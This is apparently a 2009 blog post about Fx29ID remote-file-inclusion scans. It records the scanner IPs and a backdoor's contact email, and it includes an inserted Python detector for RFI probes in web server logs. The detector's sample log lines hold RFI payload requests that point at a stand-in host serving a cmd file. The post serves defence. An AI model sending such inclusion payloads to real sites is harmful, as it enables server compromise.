
Fx29ID cmd

The FeeLCoMz RFI scanner is again scanning for possible injection on a couple of my websites.

This time using the following IPs:

210.68.188.206 (Taiwan)
125.251.133.3 (Republic of Korea)

And a possibly hacked website for hosting the cmd file remember.txt.
After searching a bit, I found 969 search results for the infected website, so it has been busy for a while.

I also got the original Fx29ID code, and I already have three variants of it. One of them has a simple base64-encoded backdoor that emails the infected host to xmair_bardj at hotmail.com; this email address does not exist anymore, so maybe it was reported or just cancelled.
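A log check for the kind of probe described above, added here as an example and not taken from the original post or from the scanner's code: it flags requests whose query parameters carry an absolute remote URL and groups them by source IP. The log lines, IPs, host names and the `ALLOWED_HOSTS` list are constructed placeholders, and the Apache combined log format is an assumption.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qsl, urlsplit

# Constructed sample lines (Apache combined format); IPs and hosts are placeholders.
SAMPLE_LOG = """\
203.0.113.10 - - [07/Jun/2009:15:40:01 +0000] "GET /index.php?page=http://compromised.example/remember.txt? HTTP/1.1" 404 512 "-" "Mozilla/5.0"
203.0.113.10 - - [07/Jun/2009:15:40:02 +0000] "GET /forum/view.php?inc=http%3A%2F%2Fcompromised.example%2Fremember.txt%3F HTTP/1.1" 404 512 "-" "Mozilla/5.0"
198.51.100.7 - - [07/Jun/2009:15:41:10 +0000] "GET /login.php?next=/account HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
198.51.100.7 - - [07/Jun/2009:15:41:12 +0000] "GET /out.php?url=https://www.example.org/docs HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

# Assumption: hosts the site legitimately passes as URL parameters (redirect targets).
ALLOWED_HOSTS = {"www.example.org"}

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (\S+) [^"]*" (\d{3}) ')


def remote_includes(target, allowed_hosts):
    """Yield (param, normalized URL) for query values that are absolute remote URLs."""
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        try:
            remote = urlsplit(value.strip())  # parse_qsl already percent-decoded it
            host = remote.hostname
        except ValueError:
            continue  # malformed value, e.g. a broken IPv6 literal
        if remote.scheme in ("http", "https", "ftp") and host and host not in allowed_hosts:
            yield name, f"{remote.scheme}://{host}{remote.path}"


def find_rfi_probes(log_text, allowed_hosts=ALLOWED_HOSTS):
    """Group suspected RFI probes by source IP: hit count, payload URLs, parameters tried."""
    report = defaultdict(lambda: {"hits": 0, "payloads": set(), "params": set()})
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not in the expected log format
        ip, target, _status = m.groups()
        for param, payload in remote_includes(target, allowed_hosts):
            report[ip]["hits"] += 1
            report[ip]["payloads"].add(payload)
            report[ip]["params"].add(param)
    return dict(report)


if __name__ == "__main__":
    for ip, entry in find_rfi_probes(SAMPLE_LOG).items():
        print(ip, entry["hits"], sorted(entry["payloads"]), sorted(entry["params"]))
```

The payload URLs collected per IP are what you would search for to see how widely the same hosted file is being used.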

Discussion

2 comments for “Fx29ID cmd”

  1. [...] probes are now being dealt with in real time. See Fx29ID cmd for a little more [...]

    Posted by Fighting Bots Via Their Bad Requests - PlanetMike's Technology Journal | June 7, 2009, 3:46 pm
  2. [...] I did some Googling for Fx29ID and found this blog post. It looks to be a rather sophisticated web server based exploit/scanning tool. This is the kind of [...]

    Posted by Blog / Fx29ID bot scans - Photography by Kieran Simkin | July 20, 2009, 10:51 pm
